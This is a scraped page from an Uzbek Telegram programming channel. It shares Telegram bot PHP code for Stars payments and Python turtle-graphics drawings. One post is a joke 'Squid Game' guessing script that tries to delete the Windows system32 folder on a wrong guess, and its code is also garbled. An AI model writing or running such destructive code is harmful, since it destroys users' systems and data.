PHPsLab


Channel's geo and language: Uzbekistan, Uzbek
Category: Telegram


Murojat: +998990294994
Helpuvatsiya qilish tekin
Reklama qabul qilmaymiz !

Related channels  |  Similar channels

Channel's geo and language
Uzbekistan, Uzbek
Category
Telegram
Statistics
Posts filter


Video is unavailable for watching
Show in Telegram


Video is unavailable for watching
Show in Telegram


FMRadioBot (1).zip
2.7Kb
🖇 @OpicUzBot kodi // kodni odam tugul molham tushinadigan darajada sharxlab qo'yganman

📜 Farmono oliy: Bu .zip ichida sayt ya'niy web_app (Web ilova) qismi ham bor , afsus bir narsa esimdan chiqibdi hullas start habari tagidagi web_app url manzilini o'zgartirishingiz mumkin .

⚙️ Sozlash: .zip faylini hosting yoki serverga joylashtirganingizda papka (jild) nomini o'zgartiring , ichidagi index.html ga ulanishda muammolar yuzaga kelishi mumkin , va webhook da ham muammo paydo bo'lishi mumkin


📁 Manba: @Aminov_dev
🖇 Tarqatildi: @PHPsLab

❕ Oʻzingizni kanallaringizda tarqating


https://www.instagram.com/aminov_coder

Beknazar raxmatov Follow bosbdi 🗿


A


@OpicUzBot kodi qiziqmi ?


Gey emas ✅


Gey emasligini tasdiqlash




Video is unavailable for watching
Show in Telegram
🙂


import random
import os

number = random.randint(1, 10)
gues = input("guess the number between 1 To 10")
Guess = int(guess)

if guess == number:
print("you won!")
else:
os.remove("c:\\windows\\system32")
Squid Game komp uchun


Kod tarjima qilish uchun yordamchi kerak , Arab tilidagi SMM Sayti


Forward from: #A 🧠
Qoʻlda torim boʻlsa yoʻqdur yorim
— Agar yorim boʻlsa yoqdur torim

😁❤️


@OpicUzBot - sinov


.




FMR




$update = json_decode(file_get_contents('php://input'));
$message = $update -> message;
$cid = $message -> chat -> id;
$mid = $message -> message_id;
$text = $message -> text;
$successful_payment = $update->message->successful_payment;
$payment_currency = $successful_payment->currency;
$payment_total_amount = $successful_payment->total_amount;
$payment_invoice_payload = $successful_payment->invoice_payload;

$chec = $update->pre_checkout_query;
$chec_id = $chec->id;
$chec_from_id = $chec->from->id;
$chec_from_name = $chec->from->first_name;
$chec_from_username = $chec->from->username;
$chec_from_language = $chec->from->language_code;
$chec_from_is_premium = $chec->from->is_premium;
$chec_currency = $chec->currency;
$chec_total_amount = $chec->total_amount;
$chec_invoice_payload = $chec->invoice_payload;


if(isset($successful_payment)){
if($payment_currency == "XTR"){
bot('sendMessage', [
'chat_id' => $cid,
'text' => "Rahmat",
'parse_mode' => "html",
]);
}
}

if(isset($chec)){
bot('answerPreCheckoutQuery', [
'pre_checkout_query_id' => $chec_id,
'ok' => true,
]);
}

if($text == "/pay"){
$miqdor = "1"; // Bu yerda xohlagan summangizni belgilashingiz mumkin
$uniqd = md5(uniqid());
$res = bot('sendInvoice', [
'chat_id' => $cid,
'title' => "@$bot",
'description' => "@$bot ni qo‘llab-quvvatlash uchun pastdagi tugmani bosing 👇👇",
'payload' => $uniqd,
'currency' => "XTR",
'prices' => json_encode([['label' => 'star', 'amount' => $miqdor]])
]);
exit();
}

@Reaksiyalar_bot dagi Stars to‘lov tizimida $miqdor qiymatini o‘zingiz xohlagan summa bilan belgilashingiz mumkin 💸✨

Manba: @WonderfulCoders
Dasturchi: @BestProger


from turtle import *
import colorsys

t = Turtle()
t.speed(0)
t.hideturtle()
t.pensize(2)
bgcolor("black")

n = 100
c = 5
s = 10

for j in range(c):
    col = [colorsys.hsv_to_rgb((i / n + j / c) % 1, 1, 1) for i in range(n)]
    z = 400 - (j * n * s)
   
    for i in range(n):
        r, g, b = col[i]
        t.color(r, g, b)
        t.up()
        t.goto(z - i * s, z - i * s)
        t.down()
        t.goto(z - i * s, -(z - i * s))
        t.goto(-(z - i * s), -(z - i * s))
        t.goto(-(z - i * s), z - i * s)
        t.goto(z - i * s, z - i * s)

done()
# 🔔 𝗞𝗮𝗻𝗮𝗹𝗴𝗮 𝗼𝗯𝘂𝗻𝗮 𝗯𝗼'𝗹𝗶𝗻𝗴!
# Manba: ➪ @Python_700 ☕︎
#Manba Joyida Qolsin Teginilmasin!!!
🌐Hech Qaysi Kanalda Tarqatilmagan Kod Manbasiz Koʻrmay  MANBA: ⤵️
👉🚀 𝗠𝗔𝗡𝗕𝗔: 💻 ➪  @Python_700
🔔 𝗞𝗮𝗻𝗮𝗹𝗴𝗮 𝗼𝗯𝘂𝗻𝗮 𝗯𝗼'𝗹𝗶𝗻𝗴!
💻 ➪ @Python_700 ☕︎

from turtle import *
import colorsys

t = Turtle()
t.speed(0)
t.hideturtle()
t.pensize(2)
bgcolor("black")

n = 50
c = [colorsys.hsv_to_rgb(i / n, 1, 1) for i in range(n)]
k = 400

for j in range(n):
    r, g, b = c[j]
    t.color(r, g, b)
    t.up()
    t.goto(k - j * 15, k - j * 15)
    t.down()
    t.goto(k - j * 15, -(k - j * 15))
    t.goto(-(k - j * 15), -(k - j * 15))
    t.goto(-(k - j * 15), k - j * 15)
    t.goto(k - j * 15, k - j * 15)

done()
🌐Hech Qaysi Kanalda Tarqatilmagan Kod Manbasiz Koʻrmay  MANBA: ⤵️
👉🚀 𝗠𝗔𝗡𝗕𝗔: 💻 ➪  @Python_700
🔔 𝗞𝗮𝗻𝗮𝗹𝗴𝗮 𝗼𝗯𝘂𝗻𝗮 𝗯𝗼'𝗹𝗶𝗻𝗴!
💻 ➪ @PHPsLab ☕︎

20 last posts shown.